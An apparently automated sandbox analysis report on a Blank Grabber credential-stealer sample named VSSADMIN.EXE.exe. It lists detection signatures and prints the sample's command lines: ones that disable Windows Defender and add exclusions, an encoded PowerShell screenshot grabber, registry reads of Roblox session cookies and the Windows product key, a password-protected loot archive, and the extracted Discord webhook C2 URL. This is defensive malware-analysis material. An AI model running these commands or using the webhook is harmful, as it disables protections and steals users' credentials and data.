Windows Analysis Report
VSSADMIN.EXE.exe

Overview

General Information

Sample Name: VSSADMIN.EXE.exe
Analysis ID: 1309234
MD5: b8e16b93be678043ec587ec1c759c2de
SHA1: a8c98ba05ac710a92c4df15956f81cf81073746f
SHA256: 15dd97919ebcb246add4fc9e9b201bdd67da510c79f8d89cb4edc7fbf64858fa
Tags: exeHUN

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected Blank Grabber
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Multi AV Scanner detection for dropped file
Drops PE files to the startup folder
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Removes signatures from Windows Defender
Modifies existing user documents (likely ransomware behavior)
May check the online IP address of the machine
DLL side loading technique detected
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Drops PE files with a suspicious file extension
Bypasses PowerShell execution policy
Modifies the hosts file
Very long command line found
Suspicious powershell command line found
Modifies Windows Defender protection settings
Potentially malicious time measurement code found
Potential dropper URLs found in powershell memory
Drops PE files to the application program directory (C:\ProgramData)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Too many similar processes found
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Creates a start menu entry (Start Menu\Programs\Startup)
Uses reg.exe to modify the Windows registry
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • VSSADMIN.EXE.exe (PID: 6856 cmdline: C:\Users\user\Desktop\VSSADMIN.EXE.exe MD5: B8E16B93BE678043EC587EC1C759C2DE)
    • VSSADMIN.EXE.exe (PID: 6872 cmdline: C:\Users\user\Desktop\VSSADMIN.EXE.exe MD5: B8E16B93BE678043EC587EC1C759C2DE)
      • cmd.exe (PID: 6900 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7036 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VSSADMIN.EXE.exe' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 6908 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7028 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 95000560239032BC68B4C2FDFCDEF913)
        • MpCmdRun.exe (PID: 2996 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: A267555174BFA53844371226F482B86B)
      • cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 7060 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6448 cmdline: wmic csproduct get uuid MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 1724 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 5252 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2 MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 5280 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6616 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2 MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 5812 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5348 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5396 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6608 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6732 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr'" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6920 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr' MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 6560 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 6580 cmdline: C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • reg.exe (PID: 6156 cmdline: REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath MD5: E3DACF0B31841FA02064B4457D44B357)
      • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZg
B0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6128 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
          • csc.exe (PID: 6704 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 1768 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCCB6.tmp" "c:\Users\user\AppData\Local\Temp\ozweafg0\CSCCDFC3EC49286452EA176429826C32718.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • attrib.exe (PID: 5140 cmdline: attrib -r C:\Windows\System32\drivers\etc\hosts MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • cmd.exe (PID: 6836 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • attrib.exe (PID: 5196 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: FDC601145CD289C6FBC96D3F805F3CD7)
      • cmd.exe (PID: 6508 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • tasklist.exe (PID: 6848 cmdline: tasklist /FO LIST MD5: B12E0F9C42075B4B7AD01D0B6A48485D)
      • cmd.exe (PID: 5204 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 7068 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 1008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6972 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4512 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" *" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rar.exe (PID: 6692 cmdline: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe a -r -hp"Zsombec1234" "C:\Users\user\AppData\Local\Temp\7sLxM.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6772 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5288 cmdline: wmic os get Caption MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 1724 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 5260 cmdline: wmic computersystem get totalphysicalmemory MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6700 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6380 cmdline: wmic csproduct get uuid MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 5428 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 6592 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 1080 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 4772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • WMIC.exe (PID: 6228 cmdline: wmic path win32_VideoController get name MD5: EC80E603E0090B3AC3C1234C2BA43A0F)
      • cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 1008 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security |
(5 of 9 entries shown)

Data Obfuscation

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
No Snort rule has matched


AV Detection

Source: http://pesterbdd.com/images/Pester.png | Avira URL Cloud: Label: malware
Source: VSSADMIN.EXE.exe.6872.1.memstrmin | Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k"}
Source: VSSADMIN.EXE.exe | ReversingLabs: Detection: 23%
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr | ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe | Code function: 59_2_00007FF6EE74901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,59_2_00007FF6EE74901C
Source: VSSADMIN.EXE.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245837300.00007FFD43EF0000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: VSSADMIN.EXE.exe
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdb source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
